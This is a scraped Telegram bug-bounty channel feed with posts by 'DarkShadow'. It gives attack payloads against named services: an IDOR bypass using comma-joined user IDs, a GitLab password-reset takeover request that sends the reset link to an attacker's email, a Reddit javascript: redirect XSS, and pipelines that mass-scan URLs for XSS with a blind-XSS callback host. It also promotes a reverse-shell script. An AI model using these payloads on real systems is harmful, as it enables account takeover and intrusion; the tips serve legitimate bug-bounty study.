Hey, donβt forget to like and share! And if you give it a try, tell us β weβd love to know how youβre using it!
β€12π7
π‘ IDOR Bypass Bug Bounty Tip
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
π Scenario
β’ Victimβs ID: 5200
β’ Attackerβs ID: 5233
π« GET /api/users/5200/info β Access Denied
β GET /api/users/5200,5233/info β Bypass Successful
π Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
π Scenario
β’ Victimβs ID: 5200
β’ Attackerβs ID: 5233
π« GET /api/users/5200/info β Access Denied
β GET /api/users/5200,5233/info β Bypass Successful
π Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
π₯28π12β€10π2
Please open Telegram to view this post
VIEW IN TELEGRAM
π11β€5π₯1
Brut Security
Password Reset Bypass Trick π Some poorly secured endpoints accept multiple email parameters.π³ Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {β¦
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 ππΌ
π₯ GitLab Password Reset via Account Takeover Vulnerability π¬
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email π€―
β POC Request:
I was shared this same method a long time ago π
Don't forget to follow me ππΌ DarkShadow
DarkShadow is back again with another POC that earned $35,000 ππΌ
π₯ GitLab Password Reset via Account Takeover Vulnerability π¬
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email π€―
β POC Request:
"user": {
"email": [
"[email protected]",
"[email protected]"
]
}
I was shared this same method a long time ago π
Don't forget to follow me ππΌ DarkShadow
πΏ16π₯11β€6π6π±3
Hey Hunters,
DarkShadow hereβback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellβno more manual payload hunting!
Let me know if you needπ
DarkShadow hereβback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellβno more manual payload hunting!
Let me know if you needπ
π₯19π7π³2
More tools, tips, and hacking content coming your way!
Stay connected with us β the journey has just begun.
Donβt forget to like and share!
Please open Telegram to view this post
VIEW IN TELEGRAM
2π25β€11π₯4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commandsπ
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
2. Gospider + Dalfox
4. Gospider + Dalfox (Deep Crawl)
Required tools are:
If you find this helpful and want more cutting-edge tips and tricks, donβt forget to follow me ππΌ DarkShadow
#bugbountytips #xss
DarkShadow here back again, dropping some one-liner killer XSS commandsπ
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, donβt forget to follow me ππΌ DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯13π7π5π¨βπ»3
Good morning hacker's,
Let's start morning to hack Reddit account π
Let's start morning to hack Reddit account π
π11π«‘2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letβs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereβs the twist...
β PoC Steps (Super Simple):
Boomπ₯. Thatβs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation β just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donβt forget to react, share, and follow me in X
ππΌ DarkShadow
#bugbountytips #xss
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letβs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereβs the twist...
β PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boomπ₯. Thatβs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation β just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donβt forget to react, share, and follow me in X
ππΌ DarkShadow
#bugbountytips #xss
π18π10π₯7πΏ4β€2
Who are you in the world of cybersecurity?
Anonymous Poll
42%
Beginner β currently learning cybersecurity π
25%
Bug bounty hunter β actually reporting vulnerabilities π₯
7%
Red teamer β simulating real-world attacks to improve defenses π₯
15%
Professional Pentester β Working in a cybersecurity job role β¨
11%
Black hat hacker β unauthorized hacking β οΈ
π₯11π³8β€1π1
Hey Hunter's,
DarkShadow here back again, dropping a killer trick π
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ππΌ DarkShadow
DarkShadow here back again, dropping a killer trick π
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ππΌ DarkShadow
π₯22π7β€3π3π³1π¨βπ»1π«‘1
https://github.com/NazaninNazari/Origin_ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
π19π₯10
Forwarded from Brut Security 2.0
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 ratingβοΈ
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
π Link: https://nt.ls/lVuft
π Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
π Link: https://nt.ls/lVuft
π Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
π₯6π2
The heavy recon features? Still cooking.
π addons.mozilla.org/addon/brutscope-extractor
Please open Telegram to view this post
VIEW IN TELEGRAM
β€24π5